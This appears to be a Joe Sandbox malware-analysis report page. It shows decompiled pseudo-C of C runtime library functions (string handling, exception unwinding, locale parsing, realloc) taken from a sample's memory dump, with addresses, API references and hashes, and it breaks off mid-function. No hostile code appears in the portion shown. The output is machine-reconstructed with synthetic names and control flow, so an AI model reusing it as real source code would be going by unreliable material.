					_t18 = E0040DF21("string too long");
				}
				if(_t28 != 0) {
					_a4 = _t18 + _t28;
					if(E0043E94C(_t28, _t44, _t38, _t43, _t18 + _t28, 0) != 0) {
						_t22 =  *((intOrPtr*)(_t44 + 0x14));
						if(_t22 < 8) {
							_t33 = _t44;
						} else {
							_t33 =  *_t44;
						}
						if(_t22 < 8) {
							_t23 = _t44;
						} else {
							_t23 =  *_t44;
						}
						E00422810(_t23 + (_t43 + _t28) * 2, _t33 + _t43 * 2,  *(_t44 + 0x10) - _t43 +  *(_t44 + 0x10) - _t43);
						E0043C7B2(_t44, _t43, _t28, _a12);
						_t27 = _a4;
						 *(_t44 + 0x10) = _t27;
						if( *((intOrPtr*)(_t44 + 0x14)) < 8) {
							_t37 = _t44;
						} else {
							_t37 =  *_t44;
						}
						 *((short*)(_t37 + _t27 * 2)) = 0;
					}
				}
				return _t44;
			}

0x0044091c
0x0044091c
0x00440923
0x00440925
0x00440929
0x0044092e
0x00440935
0x00440935
0x0044093a
0x00440944
0x0044094b
0x0044094b
0x00440952
0x0044095b
0x00440965
0x00440967
0x0044096d
0x00440973
0x0044096f
0x0044096f
0x0044096f
0x00440978
0x0044097e
0x0044097a
0x0044097a
0x0044097a
0x00440993
0x004409a2
0x004409ab
0x004409ae
0x004409b1
0x004409b7
0x004409b3
0x004409b3
0x004409b3
0x004409bb
0x004409bb
0x00440965
0x004409c5

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00440935

Part of subcall function 0040DF6E: std::exception::exception.LIBCMT ref: 0040DF83
Part of subcall function 0040DF6E: __CxxThrowException@8.LIBCMT ref: 0040DF98
Part of subcall function 0040DF6E: std::exception::exception.LIBCMT ref: 0040DFA9

std::_Xinvalid_argument.LIBCPMT ref: 0044094B
_memmove.LIBCMT ref: 00440993

Strings

string too long, xrefs: 00440946
invalid string position, xrefs: 00440930

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw_memmove
String ID: invalid string position$string too long
API String ID: 3404309857-4289949731
Opcode ID: a67f901ae6256e5f913a684657b54653c6b0bd27b7f6aee31051d492be419747
Instruction ID: 3fa426e947f7e52a2c8a9a667275c7951b609237c6a14cab5fc1e2bea56059d2
Opcode Fuzzy Hash: a67f901ae6256e5f913a684657b54653c6b0bd27b7f6aee31051d492be419747
Instruction Fuzzy Hash: AE11EBB1300305ABE724DE5DC89096AB3BAFFC5754B14452FF58287792CB74EC1587A8

Uniqueness

Uniqueness Score: -1.00%

Function 0043E9D0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 67
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0043E9D0(signed int __ecx, void* __edx, intOrPtr* _a4, signed int _a8, intOrPtr _a12) {
				void* __ebx;
				void* __edi;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;
				intOrPtr* _t28;
				intOrPtr* _t31;
				signed int _t33;
				signed int _t35;
				intOrPtr* _t39;
				void* _t43;
				intOrPtr _t46;
				intOrPtr* _t47;

				_t43 = __edx;
				_t35 = __ecx;
				_t23 =  *((intOrPtr*)(_a4 + 0x10));
				_t47 = __ecx;
				if(_t23 < _a8) {
					_t23 = E0040DF6E("invalid string position");
				}
				_t24 = _t23 - _a8;
				_t46 = _a12;
				if(_t24 < _t46) {
					_t46 = _t24;
				}
				_t25 =  *(_t47 + 0x10);
				if((_t35 | 0xffffffff) - _t25 <= _t46) {
					_t25 = E0040DF21("string too long");
				}
				if(_t46 != 0) {
					_t33 = _t25 + _t46;
					if(E0043E94C(_t33, _t47, _t43, _t46, _t33, 0) != 0) {
						_t39 = _a4;
						if( *((intOrPtr*)(_t39 + 0x14)) >= 8) {
							_t39 =  *_t39;
						}
						if( *((intOrPtr*)(_t47 + 0x14)) < 8) {
							_t28 = _t47;
						} else {
							_t28 =  *_t47;
						}
						E004224A0(_t28 +  *(_t47 + 0x10) * 2, _t39 + _a8 * 2, _t46 + _t46);
						 *(_t47 + 0x10) = _t33;
						if( *((intOrPtr*)(_t47 + 0x14)) < 8) {
							_t31 = _t47;
						} else {
							_t31 =  *_t47;
						}
						 *((short*)(_t31 + _t33 * 2)) = 0;
					}
				}
				return _t47;
			}

0x0043e9d0
0x0043e9d0
0x0043e9d8
0x0043e9dd
0x0043e9e2
0x0043e9e9
0x0043e9e9
0x0043e9ee
0x0043e9f1
0x0043e9f6
0x0043e9f8
0x0043e9f8
0x0043e9fa
0x0043ea04
0x0043ea0b
0x0043ea0b
0x0043ea12
0x0043ea15
0x0043ea24
0x0043ea26
0x0043ea2d
0x0043ea2f
0x0043ea2f
0x0043ea35
0x0043ea3b
0x0043ea37
0x0043ea37
0x0043ea37
0x0043ea4f
0x0043ea5b
0x0043ea5e
0x0043ea64
0x0043ea60
0x0043ea60
0x0043ea60
0x0043ea68
0x0043ea68
0x0043ea6c
0x0043ea72

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0043E9E9

Part of subcall function 0040DF6E: std::exception::exception.LIBCMT ref: 0040DF83
Part of subcall function 0040DF6E: __CxxThrowException@8.LIBCMT ref: 0040DF98
Part of subcall function 0040DF6E: std::exception::exception.LIBCMT ref: 0040DFA9

std::_Xinvalid_argument.LIBCPMT ref: 0043EA0B
_memmove.LIBCMT ref: 0043EA4F

Strings

string too long, xrefs: 0043EA06
invalid string position, xrefs: 0043E9E4

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw_memmove
String ID: invalid string position$string too long
API String ID: 3404309857-4289949731
Opcode ID: 7c9ee5f92550ecc6fa03f474524feeabb246713d77a18a07a69a217d244d9c2f
Instruction ID: 5be9ee11158ec11dab6cf09861ef0ba449a35630d23b8a37000f4c35dfeb68fa
Opcode Fuzzy Hash: 7c9ee5f92550ecc6fa03f474524feeabb246713d77a18a07a69a217d244d9c2f
Instruction Fuzzy Hash: 9611E731201205DBCB24EF5DD980D5AB3E6FF89714B20551FF85687291D734EA05C798

Uniqueness

Uniqueness Score: -1.00%

Function 00426E49 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 27%

			E00426E49(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				void* __ebp;
				void* _t20;
				void* _t22;
				void* _t23;
				void* _t25;
				intOrPtr* _t26;
				void* _t27;
				void* _t28;

				_t27 = __esi;
				_t26 = __edi;
				_t23 = __ecx;
				_t22 = __ebx;
				_t30 = _a20;
				if(_a20 != 0) {
					_push(_a20);
					_push(__ebx);
					_push(__esi);
					_push(_a4);
					E00426DB7(__ebx, __edi, __esi, _t30);
					_t28 = _t28 + 0x10;
				}
				_t31 = _a28;
				_push(_a4);
				if(_a28 != 0) {
					_push(_a28);
				} else {
					_push(_t27);
				}
				E00422D44(_t23);
				_push( *_t26);
				_push(_a16);
				_push(_a12);
				_push(_t27);
				E0042682D(_t22, _t25, _t26, _t27, _t31);
				_push(0x100);
				_push(_a24);
				_push(_a16);
				 *((intOrPtr*)(_t27 + 8)) =  *((intOrPtr*)(_t26 + 4)) + 1;
				_push(_a8);
				_t14 = _t22 + 0xc; // 0x6e
				_push(_t27);
				_push(_a4);
				_t20 = E00426A9C(_t22,  *_t14, _t26, _t27, _t31);
				if(_t20 != 0) {
					E00422D0B(_t20, _t27);
					return _t20;
				}
				return _t20;
			}

0x00426e49
0x00426e49
0x00426e49
0x00426e49
0x00426e4e
0x00426e52
0x00426e54
0x00426e57
0x00426e58
0x00426e59
0x00426e5c
0x00426e61
0x00426e61
0x00426e64
0x00426e68
0x00426e6b
0x00426e70
0x00426e6d
0x00426e6d
0x00426e6d
0x00426e73
0x00426e78
0x00426e7a
0x00426e7d
0x00426e80
0x00426e81
0x00426e89
0x00426e8e
0x00426e92
0x00426e95
0x00426e98
0x00426e9b
0x00426e9e
0x00426e9f
0x00426ea2
0x00426eac
0x00426eb0
0x00000000
0x00426eb0
0x00426eb6

APIs

___BuildCatchObject.LIBCMT ref: 00426E5C

Part of subcall function 00426DB7: ___BuildCatchObjectHelper.LIBCMT ref: 00426DED

_UnwindNestedFrames.LIBCMT ref: 00426E73
___FrameUnwindToState.LIBCMT ref: 00426E81

Strings

csm, xrefs: 00426E58, 00426E6D, 00426E80, 00426E9E, 00426EAE
csm, xrefs: 00426E4B

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
String ID: csm$csm
API String ID: 2163707966-3733052814
Opcode ID: 3b9ec8bbbce5097e65ee6d281750517204c971a08619dbb57a832edcfff74499
Instruction ID: e155219b6d478dd05660defc5151e96b6fc3f88d4cf20f36a3236f310f88ce15
Opcode Fuzzy Hash: 3b9ec8bbbce5097e65ee6d281750517204c971a08619dbb57a832edcfff74499
Instruction Fuzzy Hash: 4E014B75201129BBCF126F51EC45EEB3F6AEF04344F428016FD1814120D73A99B1DBA8

Uniqueness

Uniqueness Score: -1.00%

Function 0043EEFB Relevance: 7.9, APIs: 5, Instructions: 436
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0043EEFB(intOrPtr* __ecx, intOrPtr __edx, void* __eflags, intOrPtr* _a4, char _a8, char _a12, signed int _a14, char _a16, intOrPtr _a20, intOrPtr _a24, signed int* _a28, intOrPtr _a32) {
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				char _v32;
				char _v36;
				intOrPtr _t193;
				void* _t195;
				void* _t199;
				void* _t203;
				void* _t207;
				void* _t211;
				intOrPtr* _t214;
				signed int _t257;
				signed int _t283;
				intOrPtr _t290;
				signed int _t291;
				signed short _t292;
				intOrPtr* _t294;
				intOrPtr* _t296;
				intOrPtr* _t298;
				intOrPtr _t346;
				intOrPtr* _t347;
				signed int* _t349;
				void* _t350;
				void* _t351;

				_t346 = __edx;
				_t299 = __ecx;
				_t347 = __ecx;
				_t348 = __ecx + 0x14;
				_v12 = E0043B943(__ecx, 0x30, 0, __ecx + 0x14) & 0x0000ffff;
				_v20 = E0043B943(__ecx, 0x3a, 0, __ecx + 0x14) & 0x0000ffff;
				_v24 = E0043B943(_t299, 0x2c, 0, _t348) & 0x0000ffff;
				_v28 = E0043B943(_t299, 0x2f, 0, _t348) & 0x0000ffff;
				_v16 = E0043B943(_t299, 0x20, 0, _t348) & 0x0000ffff;
				_t351 = _t350 + 0x3c;
				_t193 =  *((intOrPtr*)( *__ecx + 4))();
				_v8 = _t193;
				_t290 = 2;
				if(_t193 == 0) {
					_v8 = 0;
				}
				_t195 = E0043C897( &_a8,  &_a16);
				_t349 = _a28;
				if(_t195 != 0) {
					L20:
					while(E0043C897( &_a8,  &_a16) == 0) {
						__eflags = _a12;
						if(_a12 == 0) {
							E0043C83E( &_a8);
						}
						_t291 = _v16;
						__eflags = _a14 - _t291;
						if(_a14 != _t291) {
							L22:
							_t199 = E0043C897( &_a8,  &_a16);
							if(_t199 != 0) {
								L37:
								if(E0043C897( &_a8,  &_a16) == 0) {
									__eflags = _a12;
									if(_a12 == 0) {
										E0043C83E( &_a8);
									}
									__eflags = _a14 - _t291;
									if(_a14 != _t291) {
										goto L38;
									} else {
										L36:
										E0043C86E( &_a8);
										goto L37;
									}
								}
								L38:
								_t203 = E0043C897( &_a8,  &_a16);
								if(_t203 != 0) {
									L57:
									while(E0043C897( &_a8,  &_a16) == 0) {
										__eflags = _a12;
										if(_a12 == 0) {
											E0043C83E( &_a8);
										}
										__eflags = _a14 - _t291;
										if(_a14 != _t291) {
											break;
										} else {
											E0043C86E( &_a8);
											continue;
										}
									}
									_t207 = E0043C897( &_a8,  &_a16);
									if(_t207 != 0) {
										L73:
										if(E0043C897( &_a8,  &_a16) == 0) {
											__eflags = _a12;
											if(_a12 == 0) {
												E0043C83E( &_a8);
											}
											__eflags = _a14 - _t291;
											if(_a14 != _t291) {
												goto L74;
											} else {
												L72:
												E0043C86E( &_a8);
												goto L73;
											}
										}
										L74:
										_t211 = E0043C897( &_a8,  &_a16);
										if(_t211 != 0) {
											L87:
											 *_t349 =  *_t349 | 0x00000002;
											L90:
											if(E0043C897( &_a8,  &_a16) != 0) {
												 *_t349 =  *_t349 | 0x00000001;
											}
											_t214 = _a4;
											 *_t214 = _a8;
											 *((intOrPtr*)(_t214 + 4)) = _a12;
											return _t214;
										}
										if(_a12 == _t211) {
											E0043C83E( &_a8);
										}
										_t292 = _v12;
										if(_a14 < _t292) {
											L86:
											__eflags = _v8 - 4;
											if(_v8 == 4) {
												 *((intOrPtr*)( *_t347 + 0x14))( &_v36, _a8, _a12, _a16, _a20, _a24, _t349, _a32);
												goto L89;
											}
											goto L87;
										} else {
											if(_a12 == 0) {
												E0043C83E( &_a8);
											}
											if((_t292 & 0x0000ffff) + 9 < (_a14 & 0x0000ffff)) {
												goto L86;
											} else {
												_t392 = _v8 - 4;
												if(_v8 != 4) {
													__eflags = _v8 - 3;
													if(__eflags != 0) {
														 *((intOrPtr*)( *_t347 + 0x18))( &_v36, _a8, _a12, _a16, _a20, _a24, _t349, _a32);
														L89:
														_a8 = _v36;
														_a12 = _v32;
														goto L90;
													}
													 *_t349 =  *_t349 | E0043E778(_t346, __eflags, _t347,  &_a8,  &_a16, 1, 0x1f, _a32 + 0xc);
													goto L90;
												}
												_t294 = _a32 + 0x10;
												 *_t349 =  *_t349 | E0043E778(_t346, _t392, _t347,  &_a8,  &_a16, 1, 0xc, _t294);
												 *_t294 =  *_t294 - 1;
												goto L90;
											}
										}
									}
									if(_a12 == _t207) {
										E0043C83E( &_a8);
									}
									if(_a14 == _v20) {
										goto L72;
									} else {
										if(_a12 == 0) {
											E0043C83E( &_a8);
										}
										if(_a14 == _v24) {
											goto L72;
										} else {
											if(_a12 == 0) {
												E0043C83E( &_a8);
											}
											if(_a14 != _v28) {
												goto L73;
											} else {
												goto L72;
											}
										}
									}
								}
								if(_a12 == _t203) {
									E0043C83E( &_a8);
								}
								if(_a14 < _v12) {
									L49:
									__eflags = _v8 - 2;
									if(_v8 != 2) {
										 *((intOrPtr*)( *_t347 + 0x14))( &_v36, _a8, _a12, _a16, _a20, _a24, _t349, _a32);
										__eflags = _v8 - 4;
										_a8 = _v36;
										_a12 = _v32;
										if(_v8 == 4) {
											_v8 = 3;
										}
									} else {
										 *_t349 =  *_t349 | 0x00000002;
									}
									goto L57;
								} else {
									if(_a12 == 0) {
										E0043C83E( &_a8);
									}
									if((_v12 & 0x0000ffff) + 9 < (_a14 & 0x0000ffff)) {
										goto L49;
									} else {
										if(_v8 == 1) {
											L48:
											_t296 = _a32 + 0x10;
											 *_t349 =  *_t349 | E0043E778(_t346, __eflags, _t347,  &_a8,  &_a16, 1, 0xc, _t296);
											_t351 = _t351 + 0x18;
											 *_t296 =  *_t296 - 1;
											_t291 = _v16;
											goto L57;
										}
										_t377 = _v8 - 3;
										if(_v8 == 3) {
											goto L48;
										}
										_t257 = E0043E778(_t346, _t377, _t347,  &_a8,  &_a16, 1, 0x1f, _a32 + 0xc);
										_t351 = _t351 + 0x18;
										 *_t349 =  *_t349 | _t257;
										goto L57;
									}
								}
							}
							if(_a12 == _t199) {
								E0043C83E( &_a8);
							}
							if(_a14 == _v20) {
								goto L36;
							} else {
								if(_a12 == 0) {
									E0043C83E( &_a8);
								}
								if(_a14 == _v24) {
									goto L36;
								} else {
									if(_a12 == 0) {
										E0043C83E( &_a8);
									}
									if(_a14 != _v28) {
										goto L37;
									} else {
										goto L36;
									}
								}
							}
						} else {
							E0043C86E( &_a8);
							continue;
						}
					}
					_t291 = _v16;
					goto L22;
				}
				if(_a12 == 0) {
					E0043C83E( &_a8);
				}
				if(_a14 < _v12) {
					L14:
					 *((intOrPtr*)( *_t347 + 0x14))( &_v36, _a8, _a12, _a16, _a20, _a24, _t349, _a32);
					_v8 = _t290;
					goto L15;
				} else {
					if(_a12 == 0) {
						E0043C83E( &_a8);
					}
					if((_v12 & 0x0000ffff) + 9 < (_a14 & 0x0000ffff)) {
						goto L14;
					} else {
						_t361 = _v8 - _t290;
						if(_v8 != _t290) {
							__eflags = _v8 - 1;
							if(__eflags != 0) {
								 *((intOrPtr*)( *_t347 + 0x18))( &_v36, _a8, _a12, _a16, _a20, _a24, _t349, _a32);
								L15:
								_a8 = _v36;
								_a12 = _v32;
								goto L20;
							}
							_t283 = E0043E778(_t346, __eflags, _t347,  &_a8,  &_a16, 1, 0x1f, _a32 + 0xc);
							_t351 = _t351 + 0x18;
							 *_t349 =  *_t349 | _t283;
							goto L20;
						}
						_t298 = _a32 + 0x10;
						 *_t349 =  *_t349 | E0043E778(_t346, _t361, _t347,  &_a8,  &_a16, 1, 0xc, _t298);
						_t351 = _t351 + 0x18;
						 *_t298 =  *_t298 - 1;
						goto L20;
					}
				}
			}

0x0043eefb
0x0043eefb
0x0043ef06
0x0043ef08
0x0043ef1d
0x0043ef2c
0x0043ef3b
0x0043ef4a
0x0043ef55
0x0043ef5a
0x0043ef5f
0x0043ef66
0x0043ef69
0x0043ef6a
0x0043ef6c
0x0043ef6c
0x0043ef76
0x0043ef7b
0x0043ef80
0x00000000
0x0043f07d
0x0043f05e
0x0043f062
0x0043f067
0x0043f067
0x0043f06c
0x0043f06f
0x0043f073
0x0043f090
0x0043f097
0x0043f09e
0x0043f105
0x0043f113
0x0043f0e9
0x0043f0ed
0x0043f0f2
0x0043f0f2
0x0043f0f7
0x0043f0fb
0x00000000
0x0043f0fd
0x0043f0fd
0x0043f100
0x00000000
0x0043f100
0x0043f0fb
0x0043f115
0x0043f11c
0x0043f123
0x00000000
0x0043f211
0x0043f1f5
0x0043f1f9
0x0043f1fe
0x0043f1fe
0x0043f203
0x0043f207
0x00000000
0x0043f209
0x0043f20c
0x00000000
0x0043f20c
0x0043f207
0x0043f228
0x0043f22f
0x0043f296
0x0043f2a4
0x0043f27a
0x0043f27e
0x0043f283
0x0043f283
0x0043f288
0x0043f28c
0x00000000
0x0043f28e
0x0043f28e
0x0043f291
0x00000000
0x0043f291
0x0043f28c
0x0043f2a6
0x0043f2ad
0x0043f2b4
0x0043f364
0x0043f364
0x0043f393
0x0043f3a1
0x0043f3a3
0x0043f3a3
0x0043f3a9
0x0043f3ad
0x0043f3b3
0x0043f3b8
0x0043f3b8
0x0043f2bd
0x0043f2c2
0x0043f2c2
0x0043f2c7
0x0043f2ce
0x0043f35e
0x0043f35e
0x0043f362
0x0043f384
0x00000000
0x0043f384
0x00000000
0x0043f2d4
0x0043f2d8
0x0043f2dd
0x0043f2dd
0x0043f2ee
0x00000000
0x0043f2f0
0x0043f2f0
0x0043f2f4
0x0043f318
0x0043f31c
0x0043f359
0x0043f387
0x0043f38a
0x0043f390
0x00000000
0x0043f390
0x0043f33a
0x00000000
0x0043f33a
0x0043f2f9
0x0043f30f
0x0043f314
0x00000000
0x0043f314
0x0043f2ee
0x0043f2ce
0x0043f234
0x0043f239
0x0043f239
0x0043f246
0x00000000
0x0043f248
0x0043f24c
0x0043f251
0x0043f251
0x0043f25e
0x00000000
0x0043f260
0x0043f264
0x0043f269
0x0043f269
0x0043f276
0x00000000
0x0043f278
0x00000000
0x0043f278
0x0043f276
0x0043f25e
0x0043f246
0x0043f12c
0x0043f131
0x0043f131
0x0043f13e
0x0043f1b1
0x0043f1b1
0x0043f1b5
0x0043f1d7
0x0043f1da
0x0043f1e1
0x0043f1e7
0x0043f1ea
0x0043f1ec
0x0043f1ec
0x0043f1b7
0x0043f1b7
0x0043f1b7
0x00000000
0x0043f140
0x0043f144
0x0043f149
0x0043f149
0x0043f15b
0x00000000
0x0043f15d
0x0043f161
0x0043f18c
0x0043f18f
0x0043f1a5
0x0043f1a7
0x0043f1aa
0x0043f1ac
0x00000000
0x0043f1ac
0x0043f163
0x0043f167
0x00000000
0x00000000
0x0043f17d
0x0043f182
0x0043f185
0x00000000
0x0043f185
0x0043f15b
0x0043f13e
0x0043f0a3
0x0043f0a8
0x0043f0a8
0x0043f0b5
0x00000000
0x0043f0b7
0x0043f0bb
0x0043f0c0
0x0043f0c0
0x0043f0cd
0x00000000
0x0043f0cf
0x0043f0d3
0x0043f0d8
0x0043f0d8
0x0043f0e5
0x00000000
0x0043f0e7
0x00000000
0x0043f0e7
0x0043f0e5
0x0043f0cd
0x0043f075
0x0043f078
0x00000000
0x0043f078
0x0043f073
0x0043f08d
0x00000000
0x0043f08d
0x0043ef8a
0x0043ef8f
0x0043ef8f
0x0043ef9c
0x0043f02f
0x0043f04a
0x0043f04d
0x00000000
0x0043efa2
0x0043efa6
0x0043efab
0x0043efab
0x0043efbd
0x00000000
0x0043efbf
0x0043efbf
0x0043efc2
0x0043efe9
0x0043efed
0x0043f02a
0x0043f050
0x0043f053
0x0043f059
0x00000000
0x0043f059
0x0043f003
0x0043f008
0x0043f00b
0x00000000
0x0043f00b
0x0043efc7
0x0043efdd
0x0043efdf
0x0043efe2
0x00000000
0x0043efe2
0x0043efbd

APIs

_Maklocchr.LIBCPMT ref: 0043EF11
_Maklocchr.LIBCPMT ref: 0043EF20
_Maklocchr.LIBCPMT ref: 0043EF2F
_Maklocchr.LIBCPMT ref: 0043EF3E
_Maklocchr.LIBCPMT ref: 0043EF4D

Part of subcall function 0043E778: _Maklocchr.LIBCPMT ref: 0043E7A7
Part of subcall function 0043E778: _Maklocchr.LIBCPMT ref: 0043E7DE
Part of subcall function 0043E778: __Stolx.LIBCPMT ref: 0043E900

Part of subcall function 0043E778: _Maklocchr.LIBCPMT ref: 0043E80B

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: Maklocchr$Stolx
String ID:
API String ID: 62107157-0
Opcode ID: de68c3f05c0e67bd72ca5daa7c4b539d263d8c61f338efac02a295e0c25cf89e
Instruction ID: 035cc06c83f00732ce5376ed1c79def41e3c92e192f67efdf1f8b323431aa5d3
Opcode Fuzzy Hash: de68c3f05c0e67bd72ca5daa7c4b539d263d8c61f338efac02a295e0c25cf89e
Instruction Fuzzy Hash: AEF18C7580020AEBDF14EF50D881AFF3BB8EF08304F40616AFD15A6241E7399E59DB69

Uniqueness

Uniqueness Score: -1.00%

Function 0042DA9E Relevance: 7.6, APIs: 5, Instructions: 68
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 94%

			E0042DA9E(void* __edx, void* __edi, void* __esi, void* _a4, long _a8) {
				void* _t7;
				long _t8;
				intOrPtr* _t9;
				intOrPtr* _t12;
				long _t27;
				long _t30;

				if(_a4 != 0) {
					_push(__esi);
					_t30 = _a8;
					__eflags = _t30;
					if(_t30 != 0) {
						_push(__edi);
						while(1) {
							__eflags = _t30 - 0xffffffe0;
							if(_t30 > 0xffffffe0) {
								break;
							}
							__eflags = _t30;
							if(_t30 == 0) {
								_t30 = _t30 + 1;
								__eflags = _t30;
							}
							_t7 = HeapReAlloc( *0x463830, 0, _a4, _t30);
							_t27 = _t7;
							__eflags = _t27;
							if(_t27 != 0) {
								L17:
								_t8 = _t27;
							} else {
								__eflags =  *0x464454 - _t7;
								if(__eflags == 0) {
									_t9 = E00425667(__eflags);
									 *_t9 = E00425625(GetLastError());
									goto L17;
								} else {
									__eflags = E00427E12(_t7, _t30);
									if(__eflags == 0) {
										_t12 = E00425667(__eflags);
										 *_t12 = E00425625(GetLastError());
										L12:
										_t8 = 0;
										__eflags = 0;
									} else {
										continue;
									}
								}
							}
							goto L14;
						}
						E00427E12(_t6, _t30);
						 *((intOrPtr*)(E00425667(__eflags))) = 0xc;
						goto L12;
					} else {
						E00422BFA(_a4);
						_t8 = 0;
					}
					L14:
					return _t8;
				} else {
					return E0042656D(__edx, __edi, __esi, _a8);
				}
			}

0x0042daa7
0x0042dab4
0x0042dab5
0x0042dab8
0x0042daba
0x0042dac9
0x0042dafc
0x0042dafc
0x0042daff
0x00000000
0x00000000
0x0042dacc
0x0042dace
0x0042dad0
0x0042dad0
0x0042dad0
0x0042dadd
0x0042dae3
0x0042dae5
0x0042dae7
0x0042db47
0x0042db47
0x0042dae9
0x0042dae9
0x0042daef
0x0042db31
0x0042db45
0x00000000
0x0042daf1
0x0042daf8
0x0042dafa
0x0042db19
0x0042db2d
0x0042db13
0x0042db13
0x0042db13
0x00000000
0x00000000
0x00000000
0x0042dafa
0x0042daef
0x00000000
0x0042db15
0x0042db02
0x0042db0d
0x00000000
0x0042dabc
0x0042dabf
0x0042dac5
0x0042dac5
0x0042db16
0x0042db18
0x0042daa9
0x0042dab3
0x0042dab3

APIs

_malloc.LIBCMT ref: 0042DAAC

Part of subcall function 0042656D: __FF_MSGBANNER.LIBCMT ref: 00426586
Part of subcall function 0042656D: __NMSG_WRITE.LIBCMT ref: 0042658D
Part of subcall function 0042656D: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,00425505,?,00000001,?,?,0042BD1F,00000018,0045C028,0000000C,0042BDAF), ref: 004265B2

_free.LIBCMT ref: 0042DABF

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: AllocateHeap_free_malloc
String ID:
API String ID: 1020059152-0
Opcode ID: f26947bff67df5f0971d2c3cdb06ba2b7e947e5dfc61245fb74e30f0c24c3929
Instruction ID: fa1ecc84054853881b66e7f80ef4b4a69da53f580c213c4419e05d03de0f1673
Opcode Fuzzy Hash: f26947bff67df5f0971d2c3cdb06ba2b7e947e5dfc61245fb74e30f0c24c3929
Instruction Fuzzy Hash: 5911B632B046316ACB212F75BC05F5A3BA89F443A4F91452BF5498B251DE7CDC41869D

Uniqueness

Uniqueness Score: -1.00%

Function 004029A0 Relevance: 7.6, APIs: 5, Instructions: 57
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 82%

			E004029A0() {
				intOrPtr _v4;
				char _v12;
				intOrPtr _v16;
				void* __ecx;
				signed int _t15;
				void* _t23;
				intOrPtr _t28;
				intOrPtr _t36;
				signed int _t38;
				void* _t39;

				_push(0xffffffff);
				_push(E0044DA74);
				_push( *[fs:0x0]);
				_push(_t28);
				_t15 =  *0x4608e0; // 0xb51ec2b3
				_push(_t15 ^ _t38);
				 *[fs:0x0] =  &_v12;
				_t36 = _t28;
				_v16 = _t36;
				_v4 = 4;
				E0040DAF9(_t36);
				_t19 =  *((intOrPtr*)(_t36 + 0x1c));
				_t39 = _t38 + 4;
				if( *((intOrPtr*)(_t36 + 0x1c)) != 0) {
					E00422BFA(_t19);
					_t39 = _t39 + 4;
				}
				 *((intOrPtr*)(_t36 + 0x1c)) = 0;
				_t20 =  *((intOrPtr*)(_t36 + 0x14));
				if( *((intOrPtr*)(_t36 + 0x14)) != 0) {
					E00422BFA(_t20);
					_t39 = _t39 + 4;
				}
				 *((intOrPtr*)(_t36 + 0x14)) = 0;
				_t21 =  *((intOrPtr*)(_t36 + 0xc));
